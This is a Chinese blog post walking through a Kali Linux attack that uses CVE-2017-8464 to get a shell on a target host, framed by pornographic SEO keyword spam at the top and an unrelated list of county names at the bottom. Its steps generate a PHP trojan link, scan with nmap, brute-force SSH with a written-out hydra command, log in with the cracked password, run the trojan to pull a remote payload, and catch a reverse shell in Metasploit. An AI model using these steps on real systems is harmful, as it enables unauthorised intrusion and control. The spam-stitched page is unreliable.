国产精品天干天干,亚洲毛片在线,日韩gay小鲜肉啪啪18禁,女同Gay自慰喷水

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

Kali Linux之CVE-2017-8464漏洞實(shí)現(xiàn)getshell

2023-03-09 19:30 作者:她微笑撼我心房  | 我要投稿

聲明:

本分享僅做學(xué)習(xí)交流,請(qǐng)自覺遵守法律法規(guī)!

一、戰(zhàn)略部署

1.1 打開終端,進(jìn)入kali的命令行,并切換路徑至/桌面/cve-? 2017-8464_script/

1.2?使用./secist_script.sh來運(yùn)行腳本程序

1.3?在secist>處輸入數(shù)字1進(jìn)入服務(wù)器通過web方式投遞腳本生成后門,按照提示輸入滲透機(jī)ip地址,和監(jiān)聽端口后回車

腳本程序的主要交互界面

1.4 腳本程序?qū)⒆詣?dòng)在后臺(tái)生成一個(gè)php木馬的連接

二、開始攻擊

2.1?新生成的鏈接稍后備用,使用命令Ctrl+Shift+t開啟一個(gè)新的窗口,在新的窗口輸入命令nmap?–sV –T 4 –n –p 1-1000 靶機(jī)ip 對(duì)系統(tǒng)開放端口進(jìn)行掃描

2.2?發(fā)現(xiàn)對(duì)方主機(jī)開放有22/tcp(ssh)和?80/tcp(http)端口,使用命令hydra -l administrator -P /usr/share/wordlists/fasttrack.txt 靶機(jī)IP?ssh對(duì)目標(biāo)端口進(jìn)行暴力破解

發(fā)現(xiàn)其管理員用戶的密碼為弱密碼:P@ssw0rd

2.3?使用命令ssh?administrator@靶機(jī)IP 進(jìn)行遠(yuǎn)程連接

2.4?登陸成功后,進(jìn)入到命令行中,使用命令tasklist?|findstr?httpd查看目標(biāo)服務(wù)器軟件的信息

2.5?使用命令wmic process?where?name="httpd.exe" get processid,executablepath,name查看httpd進(jìn)程運(yùn)行的路徑

2.6?切換到phpwamp\server下尋找php的路徑,繼續(xù)使用findstr來查詢前面nmap掃描獲取到的PHP關(guān)鍵的版本信息(5.6.14)

2.7?進(jìn)入目錄找到php.exe程序,然后使用1.4獲得的木馬連接使用php命令來打開遠(yuǎn)程目錄的快捷方式木馬

三、成功Getshell

3.1?回到msf命令終端,發(fā)現(xiàn)成功回彈了一個(gè)目標(biāo)的shell,使用命令sessions?–I 1進(jìn)行切換

3.2 輸入shell命令即可進(jìn)入終端




Kali Linux之CVE-2017-8464漏洞實(shí)現(xiàn)getshell的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國(guó)家法律
宣汉县| 商丘市| 黄骅市| 大石桥市| 安多县| 彭阳县| 连南| 大英县| 中卫市| 临颍县| 靖安县| 蚌埠市| 运城市| 涿州市| 银川市| 遵义县| 武鸣县| 金溪县| 乌拉特后旗| 九江县| 太谷县| 凤冈县| 玉田县| 米易县| 吉水县| 洪洞县| 南充市| 厦门市| 托克逊县| 自贡市| 镇原县| 许昌县| 页游| 衡阳县| 马公市| 邹平县| 沿河| 六安市| 罗江县| 孟连| 南雄市|